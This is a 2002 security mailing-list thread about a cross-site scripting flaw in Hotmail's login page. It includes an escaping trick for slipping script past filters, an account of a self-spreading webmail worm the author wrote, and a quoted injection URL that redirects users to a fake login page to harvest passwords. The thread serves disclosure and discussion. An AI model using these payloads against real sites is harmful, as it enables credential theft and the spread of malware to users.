If you can't get spaces in, escape them:
eval(unescape("alert('spaces%20wherever%20you%20want');"));
You can encode any character you want this way.I have some papers on XSS bugs and their implications and some tips, tricks and tools online at my website. Might be interresting for all you wannabe XSS-hackers and anybody who has a website or webbase application to secure from XSS. http://spoor12.edup.tudelft.nl/ Impact for the hotmail XSS: I wrote a hotmail virus a few months back. It's written in javascript and it abuses XSS bugs to spread itself to all people in your addressbook & inbox. It works like a charm on IE and Netscape (probably Mozilla too). It infects yahoo too (using another, yet undisclosed, XSS bug in yahoo). I was working on a port to mail.com but got bored. Combine this mass-mailer worm with the recent "download and execute any file" bugs for IE by Jelmer and friends and you've got another mass-mailin', backdoorin', script-kiddie virus. Only this time it's not just for Outlook but for any javascript capable browser(!) So, Amongst the known security problems XSS poses, you can now add that XSS bugs can lead to infection with a virus and/or a backdoor. (I hope you're not reading this with webbased hotmail or yahoo ;) Berend-Jan Wever <[EMAIL PROTECTED]> http://spoor12.edup.tudelft.nl/ 0x0dd31337 - you know who you are ;) ----- Original Message ----- From: "Muhammad Faisal Rauf Danka" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Tuesday, October 08, 2002 14:11 Subject: Re: XSS bug in hotmail login page > A lot can happen for sure, but i tried one myself, to redirect the request to some other webpage. > One can make a fake hotmail page asking for password storing it locally in a text file and then again redirect to the original hotmail page. > Usint this method one could steal passwords of hotmail/MSN users. > We have all see previously people making hotmail looking page, asking you to first login through it, or asking you to send your login/pass along with the login name with the person you want to get hacked (all nasty scams like that). > Now if it is not fixed they will have an easy way to trick them by asking them to visit hotmail new policy at : > > http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><sc ript>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html";); </script>&ct=1033054530&_setlang= > > And then have a fake setup to trick them entering their passwords at: > http://www.ownhomepage.com/frames/hotmailfake.html > > > Regards > -------- > Muhammad Faisal Rauf Danka > > Head of GemSEC / Chief Technology Officer > Gem Internet Services (Pvt) Ltd. > web: www.gem.net.pk > Key Id: 0x784B0202 > Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B > 784B 0202 > > _____________________________________________________________ > --------------------------- > [ATTITUDEX.COM] > http://www.attitudex.com/ > --------------------------- > > _____________________________________________________________ > Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
